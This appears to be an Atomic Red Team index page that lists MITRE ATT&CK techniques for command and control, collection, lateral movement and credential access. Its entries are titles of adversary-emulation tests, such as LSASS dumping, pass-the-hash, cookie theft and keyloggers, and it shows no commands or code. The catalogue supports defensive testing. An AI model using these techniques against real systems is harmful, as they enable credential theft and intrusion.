- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1219 Remote Access Software](../../T1219/T1219.md)
- Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
- Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
- Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
- Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
- Atomic Test #8: NetSupport - RAT Execution [windows]
- Atomic Test #9: UltraViewer - RAT Execution [windows]
- Atomic Test #10: UltraVNC Execution [windows]
- Atomic Test #11: MSP360 Connect Execution [windows]
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
- Atomic Test #2: DNS over HTTPS Regular Beaconing [windows]
- Atomic Test #3: DNS over HTTPS Long Domain Query [windows]
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #1: Psiphon [windows]
- Atomic Test #2: Tor Proxy Usage - Windows [windows]
- Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
- Atomic Test #4: Tor Proxy Usage - MacOS [macos]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- [T1573 Encrypted Channel](../../T1573/T1573.md)
- Atomic Test #1: OpenSSL C2 [windows]
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
- Atomic Test #1: ICMP C2 [windows]
- Atomic Test #2: Netcat C2 [windows]
- Atomic Test #3: Powercat C2 [windows]
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1065 Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
- Atomic Test #10: Windows - PowerShell Download [windows]
- Atomic Test #11: OSTAP Worming Activity [windows]
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
- Atomic Test #14: whois file download [linux, macos]
- Atomic Test #15: File Download via PowerShell [windows]
- Atomic Test #16: File download with finger.exe on Windows [windows]
- Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
- Atomic Test #18: Curl Download File [windows]
- Atomic Test #19: Curl Upload File [windows]
- Atomic Test #20: Download a file with Microsoft Connection Manager Auto-Download [windows]
- Atomic Test #21: MAZE Propagation Script [windows]
- Atomic Test #22: Printer Migration Command-Line Tool UNC share folder into a zip file [windows]
- Atomic Test #23: Lolbas replace.exe use to copy file [windows]
- Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
- Atomic Test #25: certreq download [windows]
- Atomic Test #26: Download a file using wscript [windows]
- Atomic Test #27: Linux Download File and Run [linux]
- Atomic Test #28: Nimgrab - Transfer Files [windows]
- Atomic Test #29: iwr or Invoke Web-Request download [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
- Atomic Test #3: portproxy reg key [windows]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
- Atomic Test #5: Windows Screencapture [windows]
- Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- Atomic Test #7: MacOS Swift Keylogger [macos]
- T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #1: using device audio capture commandlet [windows]
- Atomic Test #2: Registry artefact when application use microphone [windows]
- Atomic Test #3: using Quicktime Player [macos]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
- [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
- [T1119 Automated Collection](../../T1119/T1119.md)
- Atomic Test #1: Automated Collection Command Prompt [windows]
- Atomic Test #2: Automated Collection PowerShell [windows]
- Atomic Test #3: Recon information for export with PowerShell [windows]
- Atomic Test #4: Recon information for export with Command Prompt [windows]
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
- Atomic Test #3: Execute commands from clipboard [macos]
- Atomic Test #4: Collect Clipboard Data via VBA [windows]
- Atomic Test #5: Add or copy content to clipboard with xClip [linux]
- [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
- Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
- Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
- Atomic Test #3: AWS - Scan for Anonymous Access to S3 [iaas:aws]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md)
- Atomic Test #1: Compressing data using GZip in Python (Linux) [linux]
- Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux]
- Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux]
- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560 Archive Collected Data](../../T1560/T1560.md)
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1125 Video Capture](../../T1125/T1125.md)
- Atomic Test #1: Registry artefact when application use webcam [windows]
- T1213.001 Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1114.003 Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md)
- Atomic Test #1: Office365 - Email Forwarding [office-365]
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1039 Data from Network Shared Drive](../../T1039/T1039.md)
- Atomic Test #1: Copy a sensitive File over Administrative share with copy [windows]
- Atomic Test #2: Copy a sensitive File over Administrative share with Powershell [windows]
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213.003 Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
# lateral-movement
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1527 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1017 Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1021.002 Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md)
- Atomic Test #1: Map admin share [windows]
- Atomic Test #2: Map Admin Share PowerShell [windows]
- Atomic Test #3: Copy and Execute File with PsExec [windows]
- Atomic Test #4: Execute command writing output to local Admin Share [windows]
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1076 Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1021.006 Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows]
- Atomic Test #3: WinRM Access with Evil-WinRM [windows]
- [T1021.003 Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md)
- Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1550.003 Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- Atomic Test #2: PDQ Deploy RAT [windows]
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1097 Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1184 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1075 Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1563.002 Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md)
- Atomic Test #1: RDP hijacking [windows]
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1021.001 Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md)
- Atomic Test #1: RDP to DomainController [windows]
- Atomic Test #2: Changing RDP Port to Non Standard Port via Powershell [windows]
- Atomic Test #3: Changing RDP Port to Non Standard Port via Command_Prompt [windows]
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1077 Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- Atomic Test #7: MacOS Swift Keylogger [macos]
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
- Atomic Test #5: SUDO Brute Force - Debian [linux]
- Atomic Test #6: SUDO Brute Force - Redhat [linux]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
- Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
- Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) [windows]
- Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) [windows]
- Atomic Test #6: Dump Credential Manager using keymgr.dll and rundll32.exe [windows]
- T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
- [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Hashes and Usernames from Registry [windows]
- Atomic Test #5: dump volume shadow copy hives with certutil [windows]
- Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes [windows]
- [T1552.005 Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md)
- Atomic Test #1: Azure - Search Azure AD User Attributes for Passwords [azure-ad]
- Atomic Test #2: Azure - Dump Azure Instance Metadata from Virtual Machines [iaas:azure]
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1522 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.002 Brute Force: Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1555.001 Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md)
- Atomic Test #1: Keychain [macos]
- [T1003.004 OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
- [T1606.002 Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md)
- Atomic Test #1: Golden SAML [azure-ad]
- T1167 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1214 Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md)
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- Atomic Test #2: Dump individual process memory with Python (Local) [linux]
- Atomic Test #3: Capture Passwords with MimiPenguin [linux]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- Atomic Test #5: Windows Internal pktmon capture [windows]
- Atomic Test #6: Windows Internal pktmon set filter [windows]
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #9: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #10: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #11: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
- [T1552.002 Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md)
- Atomic Test #1: Rubeus asreproast [windows]
- Atomic Test #2: Get-DomainUser with PowerView [windows]
- Atomic Test #3: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
- Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
- Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- Atomic Test #4: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] [windows]
- Atomic Test #5: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] [windows]
- Atomic Test #6: WinPwn - Loot local Credentials - lazagne [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Wifi Credentials [windows]
- Atomic Test #8: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords [windows]
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
- Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
- T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #2: Search macOS Safari Cookies [macos]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
- Atomic Test #4: Simulating access to Chrome Login Data [windows]
- Atomic Test #5: Simulating access to Opera Login Data [windows]
- Atomic Test #6: Simulating access to Windows Firefox Login Data [windows]
- Atomic Test #7: Simulating access to Windows Edge Login Data [windows]
- Atomic Test #8: Decrypt Mozilla Passwords with Firepwd.py [windows]
- Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
- Atomic Test #10: Stage Popular Credential Files for Exfiltration [windows]
- Atomic Test #11: WinPwn - BrowserPwn [windows]
- Atomic Test #12: WinPwn - Loot local Credentials - mimi-kittenz [windows]
- Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
- Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
- Atomic Test #15: WebBrowserPassView - Credentials from Browser [windows]
- Atomic Test #16: BrowserStealer (Chrome / Firefox / Microsoft Edge) [windows]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
- Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
- Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
- Atomic Test #8: CertUtil ExportPFX [windows]
- Atomic Test #9: Export Root Certificate with Export-PFXCertificate [windows]
- Atomic Test #10: Export Root Certificate with Export-Certificate [windows]
- Atomic Test #11: Export Certificates with Mimikatz [windows]
- [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- [T1003.001 OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md)
- Atomic Test #1: Dump LSASS.exe Memory using ProcDump [windows]
- Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll [windows]
- Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
- Atomic Test #4: Dump LSASS.exe Memory using NanoDump [windows]
